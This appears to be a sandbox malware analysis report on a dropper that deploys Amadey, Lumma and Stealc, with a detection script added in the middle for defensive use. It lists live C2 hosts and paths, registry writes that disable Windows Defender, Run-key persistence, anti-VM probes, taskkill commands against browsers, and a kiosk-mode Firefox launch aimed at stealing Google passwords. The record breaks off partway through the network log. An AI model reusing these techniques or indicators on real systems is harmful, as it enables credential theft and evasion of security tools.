Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system -
submitted
07-12-2024 02:44
Static task
static1
Behavioral task
behavioral1
Sample
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
Resource
win7-20240903-en
General
-
Target
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
-
Size
1.8MB
-
MD5
a93b02d857db3b12c32bd765b83825ab
-
SHA1
137f12047a081e6581e1d1a83c939d98514c3ff3
-
SHA256
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa
-
SHA512
aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd
-
SSDEEP
49152:3jRwzOUOxqpHXV7ehRYo/cpkFt80BZ2QV7aGyC:3j+pOkJXV7Nqckm
Malware Config
Extracted
Family: amadey
Version: 4.42
Botnet: 9c9aa5
C2: http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
Family: lumma
C2:
- https://impend-differ.biz/api
- https://print-vexer.biz/api
- https://dare-curbys.biz/api
- https://covery-mover.biz/api
- https://formy-spill.biz/api
- https://dwell-exclaim.biz/api
- https://zinc-sneark.biz/api
- https://se-blurry.biz/api
- https://atten-supporse.biz/api
Extracted
Family: stealc
Botnet: drum
C2: http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
Family: lumma
C2:
- https://atten-supporse.biz/api
- https://se-blurry.biz/api
- https://zinc-sneark.biz/api
Signatures
-
Amadey family
-
Lumma family
-
Modifies Windows Defender Real-time Protection settings 6 IoCs
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" [27c0ef76e8.exe]
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" [27c0ef76e8.exe]
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection [27c0ef76e8.exe]
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" [27c0ef76e8.exe]
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" [27c0ef76e8.exe]
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" [27c0ef76e8.exe]
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ [skotes.exe]
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ [d1eb0cd776.exe]
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ [165fa3ed5f.exe]
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ [27c0ef76e8.exe]
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion [skotes.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion [skotes.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion [d1eb0cd776.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion [165fa3ed5f.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion [165fa3ed5f.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion [27c0ef76e8.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion [27c0ef76e8.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion [d1eb0cd776.exe]
-
Executes dropped EXE 5 IoCs
- PID 2640: skotes.exe
- PID 852: d1eb0cd776.exe
- PID 2980: 165fa3ed5f.exe
- PID 1744: a3af4d3bce.exe
- PID 3016: 27c0ef76e8.exe
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
- Key opened: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
- Key opened: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine [skotes.exe]
- Key opened: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine [d1eb0cd776.exe]
- Key opened: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine [165fa3ed5f.exe]
- Key opened: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine [27c0ef76e8.exe]
-
Loads dropped DLL 8 IoCs
- PID 1660: 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe (2 events)
- PID 2640: skotes.exe (6 events)
-
Windows security modification 2 IoCs
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features [27c0ef76e8.exe]
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" [27c0ef76e8.exe]
-
Adds Run key to start application 2 TTPs 4 IoCs
- Set value (str): \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\d1eb0cd776.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012851001\\d1eb0cd776.exe" [skotes.exe]
- Set value (str): \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\165fa3ed5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012852001\\165fa3ed5f.exe" [skotes.exe]
- Set value (str): \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3af4d3bce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012853001\\a3af4d3bce.exe" [skotes.exe]
- Set value (str): \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\27c0ef76e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012854001\\27c0ef76e8.exe" [skotes.exe]
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
- Resource: behavioral1/files/0x0005000000019358-73.dat, YARA rule: autoit_exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
- PID 1660: 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
- PID 2640: skotes.exe
- PID 852: d1eb0cd776.exe
- PID 2980: 165fa3ed5f.exe
- PID 3016: 27c0ef76e8.exe
-
Drops file in Windows directory 1 IoCs
- File created: C:\Windows\Tasks\skotes.job [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [27c0ef76e8.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [d1eb0cd776.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language [a3af4d3bce.exe]
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage [a3af4d3bce.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [taskkill.exe] (4 events)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [skotes.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [165fa3ed5f.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [a3af4d3bce.exe]
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [taskkill.exe]
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 [firefox.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature [firefox.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision [firefox.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel [firefox.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz [firefox.exe]
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier [firefox.exe]
-
Kills process with taskkill 5 IoCs
- PID 2140: taskkill.exe
- PID 764: taskkill.exe
- PID 1484: taskkill.exe
- PID 2000: taskkill.exe
- PID 532: taskkill.exe
-
Modifies registry class 1 IoCs
- Key created: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings [firefox.exe]
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
- PID 1660: 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
- PID 2640: skotes.exe
- PID 852: d1eb0cd776.exe
- PID 2980: 165fa3ed5f.exe
- PID 1744: a3af4d3bce.exe (2 events)
- PID 3016: 27c0ef76e8.exe (3 events)
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
- Token: SeDebugPrivilege, PID 2000 [taskkill.exe]
- Token: SeDebugPrivilege, PID 532 [taskkill.exe]
- Token: SeDebugPrivilege, PID 2140 [taskkill.exe]
- Token: SeDebugPrivilege, PID 764 [taskkill.exe]
- Token: SeDebugPrivilege, PID 1484 [taskkill.exe]
- Token: SeDebugPrivilege, PID 2128 [firefox.exe] (2 events)
- Token: SeDebugPrivilege, PID 3016 [27c0ef76e8.exe]
-
Suspicious use of FindShellTrayWindow 15 IoCs
- PID 1660: 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe (1 event)
- PID 1744: a3af4d3bce.exe (10 events)
- PID 2128: firefox.exe (4 events)
-
Suspicious use of SendNotifyMessage 13 IoCs
- PID 1744: a3af4d3bce.exe (10 events)
- PID 2128: firefox.exe (3 events)
-
Suspicious use of WriteProcessMemory 64 IoCs
- PID 1660 (553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe) wrote to memory of PID 2640, procid_target 29 (4 events)
- PID 2640 (skotes.exe) wrote to memory of PID 852, procid_target 31 (4 events)
- PID 2640 (skotes.exe) wrote to memory of PID 2980, procid_target 33 (4 events)
- PID 2640 (skotes.exe) wrote to memory of PID 1744, procid_target 34 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 2000, procid_target 35 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 532, procid_target 37 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 2140, procid_target 39 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 764, procid_target 41 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 1484, procid_target 43 (4 events)
- PID 1744 (a3af4d3bce.exe) wrote to memory of PID 2100, procid_target 45 (4 events)
- PID 2100 (firefox.exe) wrote to memory of PID 2128, procid_target 46 (12 events)
- PID 2128 (firefox.exe) wrote to memory of PID 2564, procid_target 47 (3 events)
- PID 2128 (firefox.exe) wrote to memory of PID 2440, procid_target 48 (9 events)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe (level 1, PID 1660)
  Command line: "C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe (level 2, PID 2640)
    Command line: "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe (level 3, PID 852)
      Command line: "C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe (level 3, PID 2980)
      Command line: "C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
    C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe (level 3, PID 1744)
      Command line: "C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\taskkill.exe (level 4, PID 2000)
        Command line: taskkill /F /IM firefox.exe /T
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\taskkill.exe (level 4, PID 532)
        Command line: taskkill /F /IM chrome.exe /T
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\taskkill.exe (level 4, PID 2140)
        Command line: taskkill /F /IM msedge.exe /T
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\taskkill.exe (level 4, PID 764)
        Command line: taskkill /F /IM opera.exe /T
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\taskkill.exe (level 4, PID 1484)
        Command line: taskkill /F /IM brave.exe /T
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      C:\Program Files\Mozilla Firefox\firefox.exe (level 4, PID 2100)
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        - Suspicious use of WriteProcessMemory
        C:\Program Files\Mozilla Firefox\firefox.exe (level 5, PID 2128)
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
          - Checks processor information in registry
          - Modifies registry class
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
          - Suspicious use of WriteProcessMemory
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 2564)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.0.1430177469\1492140918" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40084d1b-1917-43f4-9288-b39eae22dad7} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1308 fed6158 gpu
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 2440)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.1.1813241620\1207456748" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5acca9fb-cd7c-4d13-9e86-2a6e622e4aea} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1496 edeb258 socket
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 1036)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.2.803376644\835238809" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {458d177d-038d-494e-887c-a9f6c44aba4a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2072 184c7058 tab
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 2300)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.3.530846057\1271207579" -childID 2 -isForBrowser -prefsHandle 2808 -prefMapHandle 2804 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd75f913-9ac5-4a1e-9cf1-402da143d74a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2820 1bf08558 tab
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 1680)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.4.265144092\861899394" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3652 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8924fde-2a19-485e-8580-b0fbf2b4397f} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3504 1eb46258 tab
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 2704)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.5.1000239758\466541562" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe3deabe-3fa1-4efe-9119-4a14e5ea18fb} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3788 1f3ed358 tab
          C:\Program Files\Mozilla Firefox\firefox.exe (level 6, PID 2576)
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.6.1653761712\1610857076" -childID 5 -isForBrowser -prefsHandle 3876 -prefMapHandle 3660 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f22db11-68f9-48b2-b7e8-b2cdd15c9d5e} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3916 1f3ee858 tab
    C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe (level 3, PID 3016)
      Command line: "C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe"
      - Modifies Windows Defender Real-time Protection settings
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Windows security modification
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
-
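The host-side behaviour recorded in the signatures and process tree above (Defender policy values forced to 1 and TamperProtection to 0, Run keys pointing into %TEMP%, VirtualBox/BIOS/Wine registry probes, and a3af4d3bce.exe killing every browser before launching Firefox in kiosk mode on a Google sign-in URL) expressed as detection logic over Sysmon-style events. This is an added example, not the sandbox's own signature engine; the event records are constructed from the report, and the field names, the two-probe threshold for anti-VM behaviour and the finding labels are assumptions.

```python
"""Detection logic for the host artefacts in this report, run over constructed
Sysmon-style events. Added example, not sandbox tooling; the event schema
(type, pid, ppid, image, key, data, cmdline) is an assumption."""
import re
from collections import defaultdict

SID = "S-1-5-21-3063565911-2056067323-3330884624-1000"
# Constructed events mirroring the report: Defender policy writes by 27c0ef76e8.exe,
# Run-key persistence and anti-VM probes by skotes.exe, firefox.exe reading CPU
# info (benign noise), and a3af4d3bce.exe killing browsers before a kiosk launch.
EVENTS = [
    {"type": "reg_set", "pid": 3016, "image": "27c0ef76e8.exe", "data": "1",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring"},
    {"type": "reg_set", "pid": 3016, "image": "27c0ef76e8.exe", "data": "0",
     "key": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection"},
    {"type": "reg_set", "pid": 2640, "image": "skotes.exe",
     "key": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Run\d1eb0cd776.exe" % SID,
     "data": r"C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"},
    {"type": "reg_open", "pid": 2640, "image": "skotes.exe", "key": r"HKLM\HARDWARE\ACPI\DSDT\VBOX__"},
    {"type": "reg_query", "pid": 2640, "image": "skotes.exe",
     "key": r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion"},
    {"type": "reg_open", "pid": 2640, "image": "skotes.exe", "key": r"HKU\%s\Software\Wine" % SID},
    {"type": "reg_query", "pid": 2128, "image": "firefox.exe",
     "key": r"HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz"},
    {"type": "proc_create", "pid": 2000, "ppid": 1744, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": "taskkill /F /IM firefox.exe /T"},
    {"type": "proc_create", "pid": 532, "ppid": 1744, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": "taskkill /F /IM chrome.exe /T"},
    {"type": "proc_create", "pid": 2100, "ppid": 1744, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk '
                r'"https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" '
                r"--no-default-browser-check --disable-popup-blocking"},
]

DEFENDER_POLICY = re.compile(r"\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\Disable\w+$", re.I)
TAMPER_PROTECTION = re.compile(r"\\Microsoft\\Windows Defender\\Features\\TamperProtection$", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
# Each pattern is one sandbox probe the sample family uses; a process hitting two
# or more distinct probes is doing environment fingerprinting, not ordinary work.
ANTI_VM_PROBES = (
    r"\\HARDWARE\\ACPI\\DSDT\\VBOX__$",
    r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$",
    r"\\Software\\Wine$",
)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}


def detect(events):
    """Return (label, subject, detail) findings for the patterns in this report."""
    findings = []
    probes = defaultdict(set)        # (pid, image) -> distinct anti-VM probes seen
    killed_from = defaultdict(set)   # parent pid -> browsers it force-killed
    for e in events:
        key = e.get("key", "")
        if e["type"] == "reg_set":
            if DEFENDER_POLICY.search(key) and e["data"] == "1":
                findings.append(("defender_rtp_disabled", e["image"], key.rsplit("\\", 1)[1]))
            elif TAMPER_PROTECTION.search(key) and e["data"] == "0":
                findings.append(("defender_tamper_protection_off", e["image"], key.rsplit("\\", 1)[1]))
            elif RUN_KEY.search(key) and "\\appdata\\local\\temp\\" in e["data"].lower():
                findings.append(("run_key_to_temp", e["image"], e["data"]))
        elif e["type"] in ("reg_open", "reg_query"):
            for i, pat in enumerate(ANTI_VM_PROBES):
                if re.search(pat, key, re.I):
                    probes[(e["pid"], e["image"])].add(i)
        elif e["type"] == "proc_create":
            cmd = e["cmdline"].lower()
            if e["image"].lower().endswith("\\taskkill.exe"):
                m = re.search(r"/im\s+(\S+)", cmd)
                if m and m.group(1) in BROWSERS and "/f" in cmd:
                    killed_from[e["ppid"]].add(m.group(1))
            elif e["image"].lower().endswith("\\firefox.exe") and "--kiosk" in cmd and killed_from[e["ppid"]]:
                # Browser kill followed by a kiosk-mode launch from the same parent.
                findings.append(("browser_kill_then_kiosk", e["ppid"], sorted(killed_from[e["ppid"]])))
    for (pid, image), hits in probes.items():
        if len(hits) >= 2:
            findings.append(("anti_vm_probing", image, len(hits)))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(*f)
```

firefox.exe's CentralProcessor reads are deliberately left out of the anti-VM finding: a single CPU-info lookup is normal browser behaviour, which is why the rule requires two distinct probe families from one process before it fires.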
Network
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.215.113.43:80
Request:
POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
